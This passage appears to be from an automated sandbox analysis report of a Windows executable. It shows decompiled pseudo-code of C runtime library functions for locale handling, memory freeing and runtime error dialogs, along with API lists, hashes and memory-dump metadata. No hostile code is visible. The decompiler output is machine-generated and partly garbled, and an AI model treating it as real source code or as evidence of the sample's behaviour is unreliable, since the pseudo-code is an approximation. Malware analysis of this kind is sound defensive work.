					_t96 = _t95 | E009B4CB1(__ebx, _t90, _t95, _t100 - 0x14, 1, _t90, 0x10,  *((intOrPtr*)(_t100 + 8)) + 8);
					_t97 = _t96 | E009B4CB1(__ebx, _t90, _t96, _t100 - 0x14, 2, _t90, 0xe,  *((intOrPtr*)(_t100 + 8)) + 0x30);
					if((E009B4CB1(__ebx, _t90, _t97, _t100 - 0x14, 2, _t90, 0xf,  *((intOrPtr*)(_t100 + 8)) + 0x34) | _t97) == 0) {
						_t86 =  *( *(_t100 - 8));
						while( *_t86 != 0) {
							_t58 =  *_t86;
							if(_t58 < 0x30 || _t58 > 0x39) {
								if(_t58 != 0x3b) {
									goto L10;
								} else {
									_t99 = _t86;
									do {
										 *_t99 =  *((intOrPtr*)(_t99 + 1));
										_t99 = _t99 + 1;
									} while ( *_t99 != 0);
									continue;
								}
								goto L21;
							} else {
								 *_t86 = _t58 - 0x30;
								L10:
								_t86 = _t86 + 1;
							}
						}
						_t91 =  *((intOrPtr*)(_t100 - 0xc));
						_t98 =  *((intOrPtr*)(_t100 + 8));
						_t78 =  *(_t100 - 4);
						 *_t78 = 1;
						if(_t91 != 0) {
							 *_t91 = 1;
						}
						_t79 = _t78 | 0xffffffff;
						if( *((intOrPtr*)(_t69 + 0x7c)) != 0) {
							asm("lock xadd [edx], eax");
						}
						if( *(_t69 + 0x78) != 0) {
							asm("lock xadd [eax], ecx");
							if(_t79 == 1) {
								E009B2248( *(_t69 + 0x78));
								E009B2248( *((intOrPtr*)(_t69 + 0x84)));
							}
						}
						 *(_t69 + 0x78) =  *(_t100 - 4);
						_t40 = 0;
						 *((intOrPtr*)(_t69 + 0x7c)) = _t91;
						 *((intOrPtr*)(_t69 + 0x84)) = _t98;
					} else {
						E009B8902( *((intOrPtr*)(_t100 + 8)));
						 *(_t100 - 8) =  *(_t100 - 8) | 0xffffffff;
						goto L5;
					}
				}
				L21:
				return _t40;
			}


















                                                          0x009a1118
                                                          0x009b89f4
                                                          0x009b89f6
                                                          0x009b89f9
                                                          0x009b89fe
                                                          0x009b8a04
                                                          0x009b8a99
                                                          0x009b8a9c
                                                          0x009b8aa5
                                                          0x009b8aaa
                                                          0x009b8a0a
                                                          0x009b8a0d
                                                          0x009b8a12
                                                          0x009b8a26
                                                          0x009b8a3a
                                                          0x009b8a46
                                                          0x009b8a54
                                                          0x009b8a6e
                                                          0x009b8a8a
                                                          0x009b8ab4
                                                          0x009b8ac7
                                                          0x009b8ab8
                                                          0x009b8abc
                                                          0x009b8b2d
                                                          0x00000000
                                                          0x009b8b2f
                                                          0x009b8b2f
                                                          0x009b8b31
                                                          0x009b8b34
                                                          0x009b8b36
                                                          0x009b8b39
                                                          0x00000000
                                                          0x009b8b3e
                                                          0x00000000
                                                          0x009b8ac2
                                                          0x009b8ac4
                                                          0x009b8ac6
                                                          0x009b8ac6
                                                          0x009b8ac6
                                                          0x009b8abc
                                                          0x009b8acc
                                                          0x009b8acf
                                                          0x009b8ad2
                                                          0x009b8ad8
                                                          0x009b8adc
                                                          0x009b8ade
                                                          0x009b8ade
                                                          0x009b8ae3
                                                          0x009b8ae8
                                                          0x009b8aec
                                                          0x009b8aec
                                                          0x009b8af5
                                                          0x009b8af7
                                                          0x009b8afc
                                                          0x009b8b01
                                                          0x009b8b0c
                                                          0x009b8b12
                                                          0x009b8afc
                                                          0x009b8b16
                                                          0x009b8b19
                                                          0x009b8b1b
                                                          0x009b8b1e
                                                          0x009b8a8c
                                                          0x009b8a8f
                                                          0x009b8a94
                                                          0x00000000
                                                          0x009b8a98
                                                          0x009b8a8a
                                                          0x009b8b24
                                                          0x009b8b2a

                                                          APIs
                                                          • __malloc_crt.LIBCMT ref: 009B89F9
                                                            • Part of subcall function 009B22C8: _malloc.LIBCMT ref: 009B22D9
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8A1E
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D03
                                                            • Part of subcall function 009B4CB1: GetLastError.KERNEL32 ref: 009B4D15
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D35
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D4A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D77
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D8C
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DA4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8A35
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DE4
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4E0E
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4E34
                                                            • Part of subcall function 009B4CB1: __invoke_watson.LIBCMT ref: 009B4E84
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8A4F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8A66
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8A80
                                                          • ___free_lconv_num.LIBCMT ref: 009B8A8F
                                                            • Part of subcall function 009B8902: _free.LIBCMT ref: 009B8918
                                                            • Part of subcall function 009B8902: _free.LIBCMT ref: 009B892A
                                                            • Part of subcall function 009B8902: _free.LIBCMT ref: 009B893C
                                                            • Part of subcall function 009B8902: _free.LIBCMT ref: 009B894E
                                                            • Part of subcall function 009B8902: _free.LIBCMT ref: 009B8960
                                                          • _free.LIBCMT ref: 009B8A9C
                                                          • _free.LIBCMT ref: 009B8AA5
                                                          • _free.LIBCMT ref: 009B8B01
                                                          • _free.LIBCMT ref: 009B8B0C
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$___getlocaleinfo$InfoLocale___crt__calloc_crt$ErrorLast___free_lconv_num__invoke_watson__malloc_crt_malloc
                                                          • String ID:
                                                          • API String ID: 3887541295-0
                                                          • Opcode ID: 89a3d1282ca47a462c78de416b8e8aef0bc1fe52bf7d11eaebc0d0d4f47cf5de
                                                          • Instruction ID: 526dcfd86429b21713f264a25215a98350eb752caef51487fad0fcdb98f5e2ef
                                                          • Opcode Fuzzy Hash: 89a3d1282ca47a462c78de416b8e8aef0bc1fe52bf7d11eaebc0d0d4f47cf5de
                                                          • Instruction Fuzzy Hash: 7F2180729402097BEB24DBA4CD46FEE7BACDB45B60F144525FA04FB182EAB0DA40D761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009BE8C3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E009BE8C3(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E009BDB28(_t28, ?str?) != 0) {
					if(E009BDB28(_t28, ?str?) != 0) {
						return E009BEFC5(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}





                                                          0x009be8c7
                                                          0x009be8cc
                                                          0x009be8f4
                                                          0x00000000
                                                          0x009be91d
                                                          0x009be90f
                                                          0x009be93b
                                                          0x00000000
                                                          0x009be93b
                                                          0x00000000
                                                          0x009be911
                                                          0x009be939
                                                          0x00000000
                                                          0x00000000
                                                          0x009be93f
                                                          0x009be944
                                                          0x009be948
                                                          0x009be948
                                                          0x009be916

                                                          APIs
                                                          • _wcscmp.LIBCMT ref: 009BE8DA
                                                          • _wcscmp.LIBCMT ref: 009BE8EB
                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,009BEB89,?,00000000), ref: 009BE907
                                                          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,009BEB89,?,00000000), ref: 009BE931
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InfoLocale_wcscmp
                                                          • String ID: ACP$OCP
                                                          • API String ID: 1351282208-711371036
                                                          • Opcode ID: 5949c4be9a372e0b2fdcc68f0d61febfa371dc78f9639f4dc46e1ea0f8070724
                                                          • Instruction ID: a98c23c952848ed0f01ce3e33c39dce27c8b2c164c49f25d784f8634b24c9acf
                                                          • Opcode Fuzzy Hash: 5949c4be9a372e0b2fdcc68f0d61febfa371dc78f9639f4dc46e1ea0f8070724
                                                          • Instruction Fuzzy Hash: 66012832209215BAEB549F94DD41FEA37DCDF04774F004415F909DA191E730EE84C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00A010D0 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                          • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                          • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                          • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00A00060 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                          • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                          • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                          • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00A001D4 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                          • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                          • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                          • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00A0010C Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                          • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                          • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                          • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00A01148 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                          • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                          • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                          • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A320D Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 71libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E009A320D(void* __eax, void* __ebx, void* __ecx) {
				void* _t57;

				_t57 = __ebx;
				asm("pushfd");
				 *((intOrPtr*)(__ebx + 0x75ff85f8)) =  *((intOrPtr*)(__ebx + 0x75ff85f8)) + __ecx;
				GetLastError();
			}




                                                          0x009a320d
                                                          0x009b5837
                                                          0x009b5838
                                                          0x009b583e

                                                          APIs
                                                          • GetLastError.KERNEL32 ref: 009B583E
                                                          • LoadLibraryExW.KERNEL32(USER32.DLL,00000000,00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B5855
                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxW,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B586B
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B587A
                                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B5887
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B588E
                                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B589B
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58A2
                                                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58AF
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58B6
                                                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58C7
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58CE
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58D8
                                                          • OutputDebugStringW.KERNEL32(?,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: AddressEncodePointerProc$DebugDebuggerErrorLastLibraryLoadOutputPresentString
                                                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                          • API String ID: 1496758939-564504941
                                                          • Opcode ID: 45f169737ef8c58d1512ab8f110e1a217ef395b1685af0bc58588c4e790b06f7
                                                          • Instruction ID: c2a79641d0d773efffa66813ec8f0434c84026bd56148b6f04e428cfa15ca33c
                                                          • Opcode Fuzzy Hash: 45f169737ef8c58d1512ab8f110e1a217ef395b1685af0bc58588c4e790b06f7
                                                          • Instruction Fuzzy Hash: C211E470E1D302EBCB019BB1AD4CF6BBBBCAE857253550469F816D21A1DF34C800DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009B842D Relevance: 19.6, APIs: 13, Instructions: 87COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E009B842D(intOrPtr _a4) {
				intOrPtr _t15;
				intOrPtr _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t54 = _a4;
				if(_t54 != 0) {
					_t2 = _t54 + 0xc; // 0xf000000
					_t56 =  *_t2 -  *0x9cee34; // 0x9d0054
					if(_t56 != 0) {
						E009B2248(_t16);
					}
					_t3 = _t54 + 0x10; // 0x254804b7
					_t57 =  *_t3 -  *0x9cee38; // 0x9d0054
					if(_t57 != 0) {
						E009B2248(_t17);
					}
					_t4 = _t54 + 0x14; // 0x8000
					_t58 =  *_t4 -  *0x9cee3c; // 0x9d0054
					if(_t58 != 0) {
						E009B2248(_t18);
					}
					_t5 = _t54 + 0x18; // 0xfc7d80
					_t59 =  *_t5 -  *0x9cee40; // 0x9d0054
					if(_t59 != 0) {
						E009B2248(_t19);
					}
					_t6 = _t54 + 0x1c; // 0x4d8b0774
					_t60 =  *_t6 -  *0x9cee44; // 0x9d0054
					if(_t60 != 0) {
						E009B2248(_t20);
					}
					_t7 = _t54 + 0x20; // 0x706183f8
					_t61 =  *_t7 -  *0x9cee48; // 0x9d0054
					if(_t61 != 0) {
						E009B2248(_t21);
					}
					_t8 = _t54 + 0x24; // 0x5de58bfd
					_t62 =  *_t8 -  *0x9cee4c; // 0x9d0054
					if(_t62 != 0) {
						E009B2248(_t22);
					}
					_t9 = _t54 + 0x38; // 0x5d595900
					_t63 =  *_t9 -  *0x9cee60; // 0x9d0058
					if(_t63 != 0) {
						E009B2248(_t23);
					}
					_t10 = _t54 + 0x3c; // 0xec8b55c3
					_t64 =  *_t10 -  *0x9cee64; // 0x9d0058
					if(_t64 != 0) {
						E009B2248(_t24);
					}
					_t11 = _t54 + 0x40; // 0x10368
					_t65 =  *_t11 -  *0x9cee68; // 0x9d0058
					if(_t65 != 0) {
						E009B2248(_t25);
					}
					_t12 = _t54 + 0x44; // 0x875ff00
					_t66 =  *_t12 -  *0x9cee6c; // 0x9d0058
					if(_t66 != 0) {
						E009B2248(_t26);
					}
					_t13 = _t54 + 0x48; // 0x401e8
					_t67 =  *_t13 -  *0x9cee70; // 0x9d0058
					if(_t67 != 0) {
						E009B2248(_t27);
					}
					_t14 = _t54 + 0x4c; // 0x5d595900
					_t15 =  *_t14;
					_t68 = _t15 -  *0x9cee74; // 0x9d0058
					if(_t68 != 0) {
						return E009B2248(_t15);
					}
				}
				return _t15;
			}


















                                                          0x009b8431
                                                          0x009b8436
                                                          0x009b843c
                                                          0x009b843f
                                                          0x009b8445
                                                          0x009b8448
                                                          0x009b844d
                                                          0x009b844e
                                                          0x009b8451
                                                          0x009b8457
                                                          0x009b845a
                                                          0x009b845f
                                                          0x009b8460
                                                          0x009b8463
                                                          0x009b8469
                                                          0x009b846c
                                                          0x009b8471
                                                          0x009b8472
                                                          0x009b8475
                                                          0x009b847b
                                                          0x009b847e
                                                          0x009b8483
                                                          0x009b8484
                                                          0x009b8487
                                                          0x009b848d
                                                          0x009b8490
                                                          0x009b8495
                                                          0x009b8496
                                                          0x009b8499
                                                          0x009b849f
                                                          0x009b84a2
                                                          0x009b84a7
                                                          0x009b84a8
                                                          0x009b84ab
                                                          0x009b84b1
                                                          0x009b84b4
                                                          0x009b84b9
                                                          0x009b84ba
                                                          0x009b84bd
                                                          0x009b84c3
                                                          0x009b84c6
                                                          0x009b84cb
                                                          0x009b84cc
                                                          0x009b84cf
                                                          0x009b84d5
                                                          0x009b84d8
                                                          0x009b84dd
                                                          0x009b84de
                                                          0x009b84e1
                                                          0x009b84e7
                                                          0x009b84ea
                                                          0x009b84ef
                                                          0x009b84f0
                                                          0x009b84f3
                                                          0x009b84f9
                                                          0x009b84fc
                                                          0x009b8501
                                                          0x009b8502
                                                          0x009b8505
                                                          0x009b850b
                                                          0x009b850e
                                                          0x009b8513
                                                          0x009b8514
                                                          0x009b8514
                                                          0x009b8517
                                                          0x009b851d
                                                          0x00000000
                                                          0x009b8525
                                                          0x009b851d
                                                          0x009b8528

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: d88377a96474bbc85065ef84bcc1def7e784c387f8730ae7e200345f44237eb1
                                                          • Instruction ID: 057f278e9541268213c1a9db557a34ad7a81df57b44167fe861174edcd1da78a
                                                          • Opcode Fuzzy Hash: d88377a96474bbc85065ef84bcc1def7e784c387f8730ae7e200345f44237eb1
                                                          • Instruction Fuzzy Hash: 6C213532954604ABC628EB64FE85D9773EEEA083707A44D09F11AD7561CF74FC808625
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009B7973 Relevance: 19.6, APIs: 13, Instructions: 84COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 77%
                                                          			E009B7973(void* __ebx, void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t22;
				intOrPtr* _t42;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t42 = E009B2280(8, 1);
					if(_t42 != 0) {
						_t12 = E009B2280(0xb8, 1);
						 *_t42 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E009B2280(0x220, 1);
							 *((intOrPtr*)(_t42 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E009B7488( *_t42, 0x9ce800);
